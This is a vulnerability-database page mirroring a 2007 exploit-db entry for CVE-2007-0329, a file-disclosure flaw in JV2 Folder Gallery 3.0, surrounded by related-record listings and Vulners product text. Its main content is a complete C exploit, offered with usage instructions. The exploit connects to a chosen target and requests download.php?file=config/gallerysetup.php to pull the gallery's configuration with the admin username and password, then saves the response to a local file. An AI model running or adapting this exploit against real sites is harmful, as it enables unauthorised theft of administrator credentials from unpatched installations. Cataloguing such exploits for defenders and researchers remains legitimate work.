Lucene search
+L

JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure

🗓️ 14 Jan 2007 00:00:00Reported by PeTrOType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

JV2 Folder Gallery 3.0 'download.php' Remote File Disclosure by PeTr

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-0329
18 Jan 200702:00
cve
cvelist
Cvelist
CVE-2007-0329
18 Jan 200702:00
cvelist
euvd
EUVD
EUVD-2007-0331
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-0329
18 Jan 200702:28
nvd
prion
Prion
Directory traversal
18 Jan 200702:28
prion
securityvulns
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
15 Jan 200700:00
securityvulns
/*
Script Name  :JV2 Folder Gallery
Script site  :www.jv2.net

Discovered by    :SaO
Exploit Coded by :PeTrO
Credits To soulreaver,Kuz3y

Compile: Visual C++ or DevC++


*/

#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32.lib")

int main(int argc, char *argv[])
{

char gelenveri[1000];
char sendCommand[1000];
int i=0,sayac=0;

WSADATA wsdata;
SOCKET s;
struct hostent *hn;
struct sockaddr_in karsi_addr;
WSAStartup(MAKEWORD(2,0),&wsdata);



if(argc!=3)
{
     printf("\t**************************************************************\n"
            "\t*                                                            *\n"
            "\t*                   JV2 Folder Gallery                       *\n"
            "\t*        Remote Admin uName and Pass. Exploit by PeTrO       *\n"
            "\t*                                                            *\n"
            "\t*    Usage:exploit targetSite [GalleryPath]                  *\n"
            "\t*    Example:exploit localhost /gallery/                     *\n"
            "\t*                                                            *\n"
            "\t*    Discovered by    :SaO                                   *\n"
            "\t*    Exploit Coded by :PeTrO                                 *\n"
            "\t**************************************************************\n");

     exit(1);
}else{
      hn=gethostbyname(argv[1]);
     }

strcpy(sendCommand,"GET ");
strcat(sendCommand,argv[2]);
strcat(sendCommand,"download.php?file=config/gallerysetup.php \n\n");


printf("\n[+]Connecting....");
karsi_addr.sin_family = AF_INET;
karsi_addr.sin_port = htons(80);
karsi_addr.sin_addr =*((struct in_addr *)hn->h_addr);
memset(&(karsi_addr.sin_zero),'\0', 8);
if((s=socket(AF_INET, SOCK_STREAM, 0))==-1 ) //create a socket
{
    printf("\n[-]Socket Error");
    exit(-1);
}

if((connect(s,(struct sockaddr *)&karsi_addr,sizeof(struct sockaddr)))==-1)//connect server
{
    printf("\n[-]Connecting Error");
    exit(-1);
}

printf("\n[+]Sending command\n");
if((send(s,sendCommand,strlen(sendCommand),0))==-1)
{
    printf("\n[-]Sending Error");
    exit(-1);
}

if((recv(s,gelenveri,1000,0))==-1)
{
     printf("\n[-]Receive Error");
     exit(-1);
}

FILE *fp;

fp=fopen("data.txt","w");

for(i=0;sayac!=2;i++)
{
   if(gelenveri[i]==59) sayac++;

   printf("%c",gelenveri[i]);
}

fprintf(fp,"%s",gelenveri);

WSACleanup();
return 0;
}

// milw0rm.com [2007-01-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jan 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02783
35